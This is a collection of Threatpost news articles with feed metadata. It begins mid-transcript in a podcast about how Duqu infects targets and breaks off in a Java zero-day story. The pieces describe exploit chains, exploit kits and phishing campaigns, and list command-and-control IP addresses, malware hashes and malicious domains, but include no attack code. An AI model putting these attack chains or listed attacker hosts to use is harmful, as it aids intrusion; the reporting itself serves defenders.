\u2013 well, basically, this is all related to the encryption which is employed in Duqu. So, it\u2019s a \u2013 if you\u2019re familiar with the nesting dolls, the Russian matryoshkas, we can pretty much say the same. So, basically, you get a Word document by e-mail. 
And this Word document contains the exploit for the CVE-2011-3402 vulnerability.\n\nAnd the \u2013 inside the Word document, there is an embedded TrueType font file. The embedded TrueType font file which contains the exploit for this vulnerability, basically, inside this TrueType font file, the exploit is encrypted. So, the exploit decrypts itself in memory, does a number \u2013 a couple of checks, and then it fires up a loader.\n\nSo, basically, at every single point, they make sure that they delete whatever steps happened before, and they transfer control to the next module. And there are a number of different drivers and different modules which are responsible for extracting the Duqu components to disk. And basically, there are three files which get created on disk. There is one SYS driver file. There is a small PNF file, a configuration file. There is a big PNF file, so the extension is .PNF. And by the way, Stuxnet used the same extensions and this kind of similar mechanism to infect computers and install \u2013 basically, to install itself in computers. \n****\n\n**Dennis Fisher**: Okay. \n****\n\n**Costin Raiu**: So, yet another thing which is similar between Duqu and Stuxnet. And the reason why they\u2019re using unique \u2013 kind of unique sets for each target, I guess they also use different encryption, so this makes it harder to detect. Imagine that you add detection for one specific version of the toolkit without knowing that there are other victims. All the other victims, basically, they all have sets encrypted with different keys. So, it\u2019s very tailored. It\u2019s very, very targeted. And as I was saying, not just the encryption is different, but almost in every single case, they use a different command-and-control center. \n****\n\n**Dennis Fisher**: Which makes it, obviously, harder to backtrack to the CnC servers. And I know that one was taken down in India, and some others have been identified, but that\u2019s after the fact, right? 
It\u2019s after the targets have already been compromised. \n****\n\n**Costin Raiu**: Yeah, absolutely. And well, as far as I know, there is only one \u2013 just one organization in the world which has the chance to see and kind of to play with a live Duqu command-and-control center, and that was the Hungarian research lab CrySyS. So, they had a couple of days during which they could play with the command-and-control in India, this one that you mentioned. And according to their research, this server was up for a kind of long time. So, for some specific reason, they kind of prefer this command-and-control server in India.\n\nBut as you were saying, we\u2019re also aware of other command-and-control center which Duqu used. And actually, at the moment, we are kind of looking into this issue very, very deeply, so to say. Probably, I guess the number of command-and-control centers should be close to a dozen, I guess. \n****\n\n**Dennis Fisher**: Can you estimate the number of infections that you know about at this point? Can you give us a range, like, between 1 and 100? \n****\n\n**Costin Raiu**: Yes. I would suspect less than 50. \n****\n\n**Dennis Fisher**: Wow. \n****\n\n**Costin Raiu**: Of course, I may be wrong, but this is what I suspect \u2013 somewhere less than 50 infections around the world. So, very, very, very small number, actually, and very, very specific targets. \n****\n\n**Dennis Fisher**: And you mention that there\u2019s \u2013 it took a while to figure out the complete picture of what Duqu was doing, because at first you just saw the info stealer component, and then you started seeing these other components. Are you confident at this point that you\u2019ve found all of the components of at least the one specific version of Duqu? \n****\n\n**Costin Raiu**: No, definitely not. \n****\n\n**Dennis Fisher**: Okay. \n****\n\n**Costin Raiu**: So, actually, I\u2019m sure of the opposite. I\u2019m sure that we haven\u2019t seen all the single components. 
And basically, we are aware of only two different info stealer components. One of them is the original one that was located by CrySyS, and it\u2019s a very, very strange case and a big question mark for everybody what happened in that case. So, on the machine where they found this file on disk, and remember that I said that they do not create these files on disk. Instead, they run them directly from memory. \nBut, what I think that happened here is the following. Basically, if you download the modules from the command-and-control server and you run them dynamically, then the next time the system is rebooted, they lose the ability to intercept what\u2019s going on. And for probably for very high profile targets, they need this capability. They need this persistence. So, they need to be able to continue to sniff passwords and to make screenshots and to steal files even after reboot, so they need to survive after reboots.\n\nAnd I suspect that in that case they dumped the info stealer component to disk and choose \u2013 forced it to execute every time they needed it or on every boot. So, I think this could be one explanation, because the other info stealer that we are aware of that was intercepted on 18th of October, that one was never written to disk. So, it was, basically, sniffed from the network traffic. \n****\n\n**Dennis Fisher**: Wow. \n****\n\n**Costin Raiu**: And how do I know that actually there are more info stealer components? Basically, it\u2019s easy. The info stealer component that we have creates files, as I was saying, with the DQ name. But, we have also been able to identify compromised, like infected, customers which had files, now not just DQ files, but also DF files and DO files. 
And these are very interesting, particularly the DF files, because the DF files, they are a bit different from the DQ files from the point of view that they have documents inside.\n\nSo, they must have been created by a specific version of the info stealer which was collecting documents from disk, documents such as Word files, Excel files, source codes, AutoCAD documents and so on. And this specific version which creates the DF files and steals documents, we do not have. And this probably exist at the \u2013 I \u2013 we suspect that it existed somewhere around April, May, June. But later, it kind of disappeared, so the guys behind Duqu stopped using it. \n****\n\n**Dennis Fisher**: So, for one reason or another, they moved onto a different tactic? \n****\n\n**Costin Raiu**: Yeah, they removed this functionality from the info stealer. \n****\n\n**Dennis Fisher**: So, that\u2019s a fairly good indication that they\u2019re obviously paying attention to what\u2019s going on, and they\u2019re adjusting as they go along for each specific target that they\u2019re interested in. \n****\n\n**Costin Raiu**: Absolutely.\n\n_This is part one of an edited transcript of a [podcast with Costin Raiu](<https://threatpost.com/costin-raiu-duqu-stuxnet-and-targeted-attacks-111611/>). 
The second part will run tomorrow._\n", "cvss3": {}, "published": "2011-11-21T15:51:38", "type": "threatpost", "title": "Anatomy of the Duqu Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2011-3402"], "modified": "2018-08-15T10:10:52", "id": "THREATPOST:A16EDEF0DAAD6325A7D930BE82C2B01C", "href": "https://threatpost.com/anatomy-duqu-attacks-112111/75916/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:29", "description": "A few months after the hysteria around Stuxnet had died down, officials in Iran announced in April that some sensitive systems in the government\u2019s networks had been attacked by a [new piece of malware, known then as Stars](<https://threatpost.com/new-stars-malware-said-target-iran-042511/>). It now appears that attack was, in fact, the first appearance of an early version of [Duqu](<https://threatpost.com/duqu-installer-contains-windows-kernel-zero-day-110111/>), the most recent in a line of sophisticated attack tools that experts say have been designed to take out specific targets in a variety of sensitive networks.\n\nAn [analysis of the April attack](<http://www.securelist.com/en/blog/208193211/Duqu_First_Spotted_as_Stars_Malware_in_Iran>) shows that some of the machines that were infected by Stars were compromised using the same Windows kernel vulnerability that\u2019s contained in the Duqu installer. That flaw was unknown publicly until this week when information on the vulnerability emerged, which Microsoft later confirmed. The company has released a workaround for the bug, which is in the TrueType font parsing engine, and says it is working on a permanent patch for it, as well.\n\nSome of the targets of Duqu have been compromised using malicious Word documents containing exploit code for the TrueType bug, which is [CVE-2011-3402](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3402>). 
Researchers have not yet discovered a spreading mechanism for Duqu, if there is one, and it appears at the moment that the malware is being used only for attacks against carefully selected targets in a small number of countries. Among the countries in which infections have been confirmed are Sudan and Iran. Because Duqu is using a Windows kernel vulnerability as its infection method, it does not seem that the attackers are going after control systems at nuclear facilities, as Stuxnet did, but rather are likely going after PCs in key places.\n\nResearchers have found that Duqu has an architecture that is different from Stuxnet\u2019s, although the two tools do share some code-level similarities. [Duqu appears to be a customizable attack framework](<https://threatpost.com/stars-attack-iran-was-early-version-duqu-110511/>) that can be modified for any number of purposes by the individual attacker, and researchers have discovered that many known infected machines contained drivers for Duqu that were unique and not shared by other infected PCs. \n", "cvss3": {}, "published": "2011-11-05T21:08:37", "type": "threatpost", "title": "Stars Attack on Iran Was Early Version of Duqu", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2011-3402"], "modified": "2013-04-17T16:33:24", "id": "THREATPOST:7A66D3AC7210BC6168B3777DC0419A88", "href": "https://threatpost.com/stars-attack-iran-was-early-version-duqu-110511/75857/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:08", "description": "Microsoft released seven bulletins fixing 23 vulnerabilities in their patch Tuesday announcement today. 
The Redmond, Wash., software giant rated three of the bulletins as \u2018critical,\u2019 all of which could lead to remote code execution, and the remaining four as \u2018important.\u2019\n\nThe first critical bulletin resolves a privately reported bug in Microsoft Office through which an attacker could remotely execute code after the user opens a specially crafted RTF file. Upon successful exploitation, the attacker would possess the same user rights as the current user. Users with fewer user rights would be less impacted than those that operate with administrative user rights.\n\nThe second patch resolves three publicly disclosed bugs and seven privately disclosed ones in Microsoft Office, Microsoft Windows, the Microsoft .NET Framework, and Microsoft Silverlight. These could also lead to remote code execution if an attacker can find a way to trick users into opening a specially crafted document or visiting a webpage that embeds TrueType font files.\n\nThis set of vulnerabilities fixed by the MS12-034 patch is designed to fix one of the vulnerabilities exploited by the Duqu malware. Microsoft had already patched that bug in other applications, but in the last few months it had discovered that a snippet of code that was part of the CVE-2011-3402 vulnerability was present in other places in Microsoft products, as well.\n\n\u201cIn the time since we shipped MS11-087, we discovered that several Microsoft products contained a copy of win32k.sys\u2019s font parsing code. Unfortunately, each copy of the code also contained the vulnerability addressed by MS11-087. The most troublesome copy was in gdiplus.dll. We know that several third party applications \u2013 3rd party browsers in particular \u2013 might use gdiplus.dll to parse and render custom fonts. Microsoft Office\u2019s version of gdiplus, called ogl.dll, also contained a copy of the vulnerable code. Silverlight included a copy of the vulnerable code. 
And the Windows Journal viewer included a copy of the vulnerable code,\u201d Microsoft said in a blog post today. \n\n\u201cIn addition to addressing the vulnerabilities described in the bulletin, this security update also closes the malicious keyboard layout file attack vector. Windows Vista introduced a requirement that all keyboard layout files be loaded from %windir%system32. MS12-034 ports that change downlevel to Windows XP and Windows Server 2003 as well.\u201d\n\nThe last critically rated patch fixes two privately reported vulnerabilities in Windows and the .NET Framework. These could allow for remote code execution on client systems where the user views a specially crafted webpage that can run XAML browser applications. Again, users with fewer rights are less impacted.\n\nAs for the four important patches remaining, the first resolves six vulnerabilities in Microsoft Office and the second resolves one vulnerability in Microsoft Visio Viewer. Both vulnerabilities, if left unpatched, could lead to remote code execution. The last two important patches could both lead to elevation of privileges. 
The first resolves two bugs in TCP/IP and the second resolves a vulnerability in Windows Partition Manager.\n\nYou can find the bulletin summary [here](<http://technet.microsoft.com/en-us/security/bulletin/ms12-may>) on Microsoft\u2019s TechNet blog.\n", "cvss3": {}, "published": "2012-05-08T18:22:19", "type": "threatpost", "title": "Microsoft Ships Seven Bulletins Fixing 23 Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2011-3402"], "modified": "2013-04-17T20:03:35", "id": "THREATPOST:10E07EA1EC79D258B439B4CA2F562B51", "href": "https://threatpost.com/microsoft-ships-seven-bulletins-fixing-23-bugs-050812/76540/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:08:18", "description": "Malicious hackers have pounced on a newly patched Adobe PDF Reader vulnerability to plant Trojan downloaders on tardy Windows users.\n\nAccording to researchers in Microsoft\u2019s malware protection center, the vulnerability (CVE-2010-0188) was patched less than a month ago, proving that malicious hackers are quick to find fresh targets for malware.\n\nMicrosoft\u2019s Marian Radu [explains](<http://blogs.technet.com/mmpc/archive/2010/03/08/cve-2010-0188-patched-adobe-reader-vulnerability-is-actively-exploited-in-the-wild.aspx>):\n\nWhile recently analyzing a malicious PDF file, I noticed a vulnerability exploited by the sample which I\u2019ve never encountered before. After a bit of research I came to the conclusion that this specific sample exploited CVE-2010-0188. \n\nThis is a fresh vulnerability, information about which was [just published this February](<http://www.adobe.com/support/security/bulletins/apsb10-07.html>). It is described as possibly leading to arbitrary code execution, which is exactly what\u2019s happening. 
\n\nRadu said the malicious PDF causes Adobe Reader to open and then close. While this is happening, an executable file named a.exe is dropped directly onto the C: drive. \n\nThe dropped executable, which is actually embedded into the PDF file, tries to connect to a .biz registered domain to download other files. JavaScript is again used to successfully exploit this vulnerability, so disabling it for unknown documents might be a good idea. \n\nOnly Windows users who have not yet updated to the newest version of Adobe Reader are vulnerable to this threat.\n\nSeparately, the folks at F-Secure have [released a chart](<http://www.f-secure.com/weblog/archives/00001903.html>) showing the gradual growth of Adobe Reader as the most commonly exploited software in targeted attacks.\n", "cvss3": {}, "published": "2010-03-10T21:37:09", "type": "threatpost", "title": "Recently Patched Adobe PDF Flaw Being 'Actively Exploited'", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-0188"], "modified": "2018-08-15T13:16:25", "id": "THREATPOST:1930272869F47EB9224C7FAB6F1DC5B1", "href": "https://threatpost.com/recently-patched-adobe-pdf-flaw-being-actively-exploited-031010/73663/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:50", "description": "Attackers are sending spoofed \u201cpending notification\u201d emails to Facebook users, claiming that the recipients overlooked some alert on the world\u2019s largest social network, and providing them with a link that supposedly leads to the allegedly neglected content but which, in reality, funnels users to a series of compromised websites hosting[ the Black Hole Exploit Kit](<https://threatpost.com/black-hole-exploit-kit-20-released-091212/>), according to researcher Dancho Danchev.\n\nThe malicious email, which can be seen below, is crafted to and does a serviceable job of mimicking Facebook\u2019s widely-recognizable interface. 
However, it also contains a typo that is indicative of the sorts of writing errors that have become a hallmark of spam campaigns in general.\n\n\n\nIn his write-up on Webroot\u2019s Threat Blog, Danchev identifies [CVE-2010-0188](<https://threatpost.com/fake-facebook-alert-emails-link-black-hole-sites-112712/>), an Adobe bug patched in 2010, as an example of an exploit served in the attack. He also claims that the malicious payload and exploits appear to be hosted on a \u2018ceredinople[dot]ru,\u2019 whereas the compromised website that the email links to is \u2018covellgroup[dot]com/new.htim?_RAINDOM_CHARACTERS.\u2019\n\nSuccessful exploitation drops [this Win32 executable](<https://www.virustotal.com/file/1748f38a7c0d4ac1aa023dac666727fb799ded5fc946b2b7732cc3a5da51290d/analysis/>) on its victims. It is detected by most antivirus products but is identified by a number of different names.\n\nDanchev lists a number of IP addresses and related domains implicated in this campaign. You can see them in his report [here](<http://blog.webroot.com/2012/11/27/bogus-facebook-pending-notifications-themed-emails-serve-client-side-exploits-and-malware/>).\n\nThis isn\u2019t the first time Facebook users have been targeted in this kind of attack, in fact, so pervasive is the phishing problem for Facebook that they created a dedicated email address, Phish@FB.com, where users can forward suspect emails for inspection.\n", "cvss3": {}, "published": "2012-11-27T16:33:19", "type": "threatpost", "title": "Fake Facebook Alert Emails Link to Black Hole Sites", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-0188"], "modified": "2013-04-17T20:02:44", "id": "THREATPOST:E9BF216DCC61669F4F582E1BBBAC6123", "href": "https://threatpost.com/fake-facebook-alert-emails-link-black-hole-sites-112712/77247/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:03", "description": "Criminal hackers launched 
an attack campaign earlier this week in which they sent a slew of emails purporting to come from the financial software developer Intuit. The emails contained links that led to sites hosting the Blackhole exploit kit in an apparent attempt to infect the machines of corporate users.\n\nIn a Webroot analysis, Dancho Danchev explains that the two separate campaigns imitated Intuit Payroll\u2019s direct deposit system in hopes that their recipients would follow malicious links included in the emails and thus infect themselves with the latest version of the[ Black Hole Exploit kit](<https://threatpost.com/black-hole-exploit-kit-20-released-091212/>).\n\nThe exploit is serving an [Adobe](<https://threatpost.com/adobe-extends-security-reader-and-acrobat-better-sandbox-force-aslr-101712/>) vulnerability from two years ago, [CVE-2010-0188](<https://threatpost.com/recently-patched-adobe-pdf-flaw-being-actively-exploited-031010/>). A successful exploitation will load \u2018MD5: 5723f92abf257101be20100e5de1cf6f\u2019 and \u2018MD5: 06c6544f554ea892e86b6c2cb6a1700c\u2019 to its host.\n\nThe various malicious domains used in the campaign responded to the same set of IP addresses. You can find a list of the malicious URLs in [Danchev\u2019s write-up](<http://blog.webroot.com/2012/10/18/intuit-payroll-confirmation-inquiry-themed-emails-lead-to-the-black-hole-exploit-kit/>).\n\nThe first campaign\u2019s emails looked like [this](<http://webrootblog.files.wordpress.com/2012/10/intuit_spam_exploits_black_hole_exploit_kit.png>) and the second campaign\u2019s emails looked like [this](<http://webrootblog.files.wordpress.com/2012/10/intuit_spam_exploits_black_hole_exploit_kit_02.png>). 
Users that followed the malicious link were presented with[ a bogus loading screen](<http://webrootblog.files.wordpress.com/2012/10/intuit_spam_exploits_black_hole_exploit_kit_01.png>) that claimed they would not be able to access their QuickBooks account without an update to the Intuit Security Tool.\n", "cvss3": {}, "published": "2012-10-19T15:11:39", "type": "threatpost", "title": "Fake Payroll Confirmation Email Leads to Black Hole Exploit Kit", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-0188"], "modified": "2013-04-17T20:02:47", "id": "THREATPOST:8C3A036DB8F89D3EF360D44B4BFEF81F", "href": "https://threatpost.com/fake-payroll-confirmation-email-leads-black-hole-exploit-kit-101912/77132/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:42", "description": "Thanks to the wonderful tendency of users not to update their applications, old vulnerabilities never die, they just get overtaken by newer and shinier ones. The attackers know this well, and every once in a while they serve up a nice reminder to the rest of us. The most recent one of these is a string of attacks against an Adobe Reader vulnerability from 2010.\n\nThe vulnerability, which is more than two years old, is a [flaw in Reader and Acrobat](<http://www.adobe.com/support/security/bulletins/apsb10-07.html>) that can be exploited remotely. At the time of the first reports about the bug, there were active attacks going on against it and exploit code was circulating online. But the [CVE-2010-0188](<http://www.securityfocus.com/bid/38195/info>) bug didn\u2019t turn into one of those huge things that involve widespread malware attacks and so on. 
And it\u2019s been patched for a long time at this point, but that doesn\u2019t mean it\u2019s of no use to the bad guys anymore.\n\nResearchers at Symantec have found that there are still attacks ongoing against the bug, which affects Reader and Acrobat on all of the major platforms. The attacks involve some highly obfuscated JavaScript, as such attacks are wont to do, and the end result is that once the resultant shell code is on the victim\u2019s machine, it attempts to download a malicious executable from a remote server.\n\nThe attacks against this bug have been coming in waves for the last month or so, and Symantec researchers said that the company has seen more than 10,000 such attacks in just the last couple of weeks.\n\n\u201cThe JavaScript was embedded in an XFA object (object 8 in the above figure) in an Acrobat Form. The JavaScript manipulated a subform field by using a reference to an embedded element, \u2018qwe123b\u2019 in the example. When such an exploited PDF sample is loaded into the vulnerable PDF reading application, the XFA initialize activity is triggered and the embedded JavaScript will be called. After manually de-obfuscating it, we were able to extract the hidden JavaScript,\u201d [Jason Zhang of Symantec](<https://threatpost.com/waves-attacks-target-adobe-reader-bug-2010-022212/>) wrote in an analysis of the attacks. \n\nOnce the JavaScript runs, it does a few things, including checking the version of the vulnerable application that\u2019s on the targeted machine. That version number is then converted into a huge integer and the JavaScript builds an exploit and shell code that\u2019s specific to that version. It then sprays the shell code into the application\u2019s memory and is off and running. But that\u2019s only half of the game.\n\nThe shell code includes an obfuscated URL to which the code attempts to connect and then download an executable. 
\n\n\u201cIt clearly shows that a malicious executable file will be downloaded once the shellcode gets executed successfully. Unfortunately, the malicious file link only existed for a very short time and we have been unable to retrieve the actual executable sample as yet,\u201d Zhang said.\n", "cvss3": {}, "published": "2012-02-22T15:45:46", "type": "threatpost", "title": "Waves of Attacks Target Adobe Reader Bug From 2010", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-0188"], "modified": "2013-04-17T16:32:46", "id": "THREATPOST:456A3BB9FB7D16110E8A4ABAC506A95F", "href": "https://threatpost.com/waves-attacks-target-adobe-reader-bug-2010-022212/76243/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:36", "description": "Oracle\u2019s emergency Java update this weekend for a [zero-day sandbox bypass vulnerability](<https://threatpost.com/nasty-new-java-zero-day-found-exploit-kits-already-have-it-011013/>) hasn\u2019t exactly kicked off a love-fest for the company among security experts. Researchers are still cautious about recommending users re-enable the ubiquitous software, despite the availability of the fix for the latest zero-day to target the platform. 
\n\nSome caution there are still ways to bypass a [heightened security configuration in the update](<http://www.oracle.com/technetwork/java/javase/7u-relnotes-515228.html>), and yet others remain concerned about fixes for vulnerabilities reported months ago that still have not been addressed.\n\nAdam Gowdiak of Security Explorations in Poland said Oracle has yet to address vulnerabilities reported in April and September of last year; the [September vulnerability](<https://threatpost.com/new-zero-day-vulnerability-found-java-5-6-and-7-11-billion-desktops-affected-092612/>), like the one fixed over the weekend, is a sandbox bypass vulnerability that would enable an attacker to remotely execute code.\n\n\u201c[This] is especially important as a critical vulnerability that affects all Java SE versions released over the [last] eight years or so,\u201d Gowdiak said. \u201cWe have confirmed that our proof of concept code for it works with flying colors under Java SE 7 Update 11 released yesterday.\u201d\n\nJaime Blasco, a researcher with AlienVault, echoes Gowdiak\u2019s concerns that users should continue to leave the Java browser plug-in disabled.\n\n\u201cI don\u2019t think it\u2019s very useful right now,\u201d Blasco said. \u201cI think right now you won\u2019t find Java applets on most websites; regular users don\u2019t need Java right now.\u201d\n\n[Oracle rushed Java 1.7u11 out the door on Sunday](<http://www.oracle.com/technetwork/java/javase/7u11-relnotes-1896856.html>), less than a week after the discovery of the vulnerability and exploits in the wild. The most noteworthy enhancement is that Oracle has changed Java\u2019s default security level setting to high from medium. 
As a result, unsigned or self-signed Java applications will no longer run by default; users will have to approve applets to run them.\n\n\u201cWith the \u2018High\u2019 setting, the user is always warned before any unsigned application is run to prevent silent exploitation,\u201d Oracle said in its advisory.\n\nBlasco said while this is a good first step, it would not prevent an attacker from tricking the user via social engineering, for example, to execute a malicious applet manually. Also, an attacker with a valid, stolen digital certificate could also, in theory, sign and execute a malicious applet.\n\nThe call to disable Java began again in earnest last Thursday when French researcher [Kafeine](<http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html>) reported that he found websites hosting exploits for a new zero-day and that exploit kits such as Blackhole had already incorporated the exploit. Soon, most of the major exploit kits including Cool, Nuclear Pack, Sakura, and Redkit, had the exploits. By Friday, an exploit module for the zero-day had been added to [Metasploit](<https://community.rapid7.com/community/metasploit/blog/2013/01/11/omg-java-everybody-panic>), and it was game-on.\n\nHD Moore, Metasploit creator, said the issue in Java 7u10 was a privilege-escalation vulnerability ([CVE-2013-0422](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0422>)) in the MBeanInstantiator.\n\n\u201cA lot of the recent Java exploits use a technique similar to this one where they find a class that\u2019s already loaded in memory that accesses an object outside the sandbox, and then they use that object to load arbitrary code,\u201d Moore told Threatpost last week. \u201cIt\u2019s about as bad as you can get in terms of a reliable Java exploit that affects the latest version of Java 1.7. 
It\u2019s already being used by all the bad guys and at this point, it\u2019s just catch-up and how fast Oracle can respond.\u201d\n\nFireEye reported last week, and Blasco confirmed today, that some [exploits are serving up ransomware](<https://threatpost.com/incomplete-java-patch-paved-way-latest-zero-day-mess-011113/>). Now that the exploits are part of kits, any payload from banking Trojans, to keyloggers or botnets can be added, researchers said.\n\n\u201cHaving this in the exploit kits is the worst possible scenario; exploit kits are one of the biggest security issues users are facing,\u201d Blasco said. \u201cIf you are a cybercriminal and have money, you will get something that works. You can buy anything, even without knowing anything about coding exploits.\u201d\n\nJava\u2019s availability on numerous platforms from Windows to Linux to Mac OS X makes it an [attractive target for exploit writers](<https://threatpost.com/security-experts-recommend-long-hard-look-disabling-java-browser-plug-100412/>). A reliable exploit will run anywhere.\n\n\u201cIf you have an exploit for memory issues and the exploit is reliable, you don\u2019t have to code a different exploit for different languages or platforms, it just works everywhere. 
You will have 100 percent probability of exploiting the target if it is vulnerable to that issue.\u201d\n", "cvss3": {}, "published": "2013-01-14T16:40:39", "type": "threatpost", "title": "Emergency Zero-Day Patch Does Not Quiet Calls to Disable Java", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-0422"], "modified": "2013-05-10T14:25:22", "id": "THREATPOST:8EC50F1755EA55A58BB75546EB1CB667", "href": "https://threatpost.com/emergency-zero-day-patch-does-not-quiet-calls-disable-java-011413/77401/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:36", "description": "Scammers are spamming out malicious emails purporting to come from payroll processing company ADP, according to Dancho Danchev of Webroot.\n\nThe emails arrive under the subject line \u201cADP Immediate Notifications\u201d and contain links to compromised websites hosting the latest iteration of the[ Blackhole exploit kit](<https://threatpost.com/cool-blackhole-exploit-kits-created-same-hacker-010913/>). The kit is serving a CVE-2013-0422 Java exploit, which Danchev claimed was still active when he published his report. However, [Oracle appears to have patched the bug sometime yesterday](<http://www.oracle.com/technetwork/topics/security/alert-cve-2013-0422-1896849.html>).\n\nThe exploit is dropping the \u2018Win32/Cridex.E\u2019 and \u2018Win32/Farei\u2019 Trojans, which are detected by 12 and eight out of 46 antivirus scanners respectively. After exploitation, the malware is phoning home to command and control servers at the following IP addresses: 173.201.177.77, 132.248.49.112, 95.142.167.193, and 81.93.250.157.\n\nThe campaign makes use of a healthy list of suspicious looking URLs that you can check out along with [Danchev\u2019s write-up](<http://blog.webroot.com/2013/01/14/fake-adp-speedy-notifications-lead-to-client-side-exploits-and-malware/>). 
It\u2019s fairly commonplace for social engineers [to mimic ADP in their phishing campaigns](<https://threatpost.com/fake-adp-and-fdic-notifications-leading-users-blackhole-exploit-kit-091412/>) because of the vastness of the company\u2019s payroll operation.\n\n\n", "cvss3": {}, "published": "2013-01-14T18:29:21", "type": "threatpost", "title": "ADP-Themed Phishing Emails Lead to Blackhole Sites", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-0422"], "modified": "2013-05-13T19:06:03", "id": "THREATPOST:957A3FEFD479E0736CDB1542A4319181", "href": "https://threatpost.com/adp-themed-phishing-emails-lead-blackhole-sites-011413/77402/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:16", "description": "Another day, another media company hacked. This time it\u2019s NBC which has fallen victim to hackers on the heels of compromises of the _[New York Times](<https://threatpost.com/inside-targeted-attack-new-york-times-013113/>)_ and _Wall Street Journal_ websites. Various experts have confirmed that NBC\u2019s website is compromised and leading visitors to the dangerous [Citadel banking Trojan](<https://www.google.com/url?q=http://threatpost.com/en_us/blogs/citadel-trojan-it-s-not-just-banking-fraud-anymore-020113&sa=U&ei=wosmUfPPKYei2QXMy4C4Ag&ved=0CAoQFjAB&client=internal-uds-cse&usg=AFQjCNHMrwHVyHwOjJNPZQxj_el4hxq2wQ>). The site is reportedly hosting an iframe that is redirecting visitors to sites hosting the RedKit Exploit Kit which is serving up the Citadel malware. \n\n\n[The HitmanPro blog](<http://hitmanpro.wordpress.com/2013/02/21/nbc-com-hacked-serving-up-citadel-malware/>) said there were two malicious links on the NBC site connecting to the exploits, one on the home page and another on an internal page. 
The links serve Java and PDF exploits that drop Citadel; the Java exploit is the same [sandbox bypass vulnerability](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0422>) patched in Java 7u11.\n\nThe site remained infected as of 3:30 p.m. ET as attackers were rotating out the iframes regularly, each pointing to a number of attack pages, including a site with a Russian name that translates to my-new-sploit [dot]com.\n\nResearchers at Kaspersky Lab confirmed the redirections are leading victims to Citadel and Zeus (Trojan-Spy.Win32.Zbot.jfgj). Citadel is a version of Zeus and is used primarily for banking fraud. Experts say it is sold only in the Russian underground and only to certain customers in order to keep support costs down and reduce the risk of infiltration by law enforcement.\n\nIndependent security consultant Dancho Danchev [tied the NBC attacks to a recent spam campaign targeting Facebook and Verizon](<http://ddanchev.blogspot.com/2013/02/dissecting-nbcs-exploits-and-malware.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+DanchoDanchevOnSecurityAndNewMedia+\\(Dancho+Danchev+-+Mind+Streams+of+Information+Security+Knowledge!\\)>). Danchev said cybercriminals were trying to impersonate Facebook and trick users into thinking their accounts had been shut down. Malicious links used in the spam messages pointed to sites hosting exploits served by the Black Hole Exploit Kit.\n\nDanchev said one of the domains used in the NBC attack matches one used in the Facebook spam campaign, while an email address used to register another domain in the NBC attack matches one similarly used in a campaign against Verizon.\n\n\u201cSomeone\u2019s multitasking,\u201d Danchev said. 
\u201cThat\u2019s for sure.\u201d\n\nNBC image via [Xurble](<http://www.flickr.com/photos/xurble/>)\u2018s Flickr photostream, Creative Commons\n", "cvss3": {}, "published": "2013-02-21T21:07:10", "type": "threatpost", "title": "NBC Website Hacked, Leading Visitors to Citadel Banking Malware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-0422"], "modified": "2013-05-08T15:53:59", "id": "THREATPOST:FC1FB8B56F9BBADC1A51E615FCAF0C39", "href": "https://threatpost.com/nbc-website-hacked-leading-visitors-citadel-banking-malware-022113/77554/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:14", "description": "After a glorious 72-hour stretch without one, security researchers confirmed yesterday that they found [yet another zero-day vulnerability](<https://threatpost.com/two-more-java-zero-days-found-polish-research-team-022513/>) in Oracle\u2019s thoroughly troubled Java platform.\n\nWith a little help from Hermes Bojaxhi and his team at [Cyber Engineering Services](<http://www.cyberesi.com/>), researchers from the security firm FireEye [found](<http://blog.fireeye.com/research/2013/02/yaj0-yet-another-java-zero-day-2.html>) that attackers have successfully exploited this latest zero-day vulnerability in the wild, compromising the machines of users running browsers with Java six update 41 and Java seven update 15.\n\nFireEye researchers Darien Kindlund and Yichong Lin claim that this vulnerability is different from the seemingly endless parade of Java zero-days that precede it. A security manager could pretty easily disable the other vulnerabilities, Kindlund 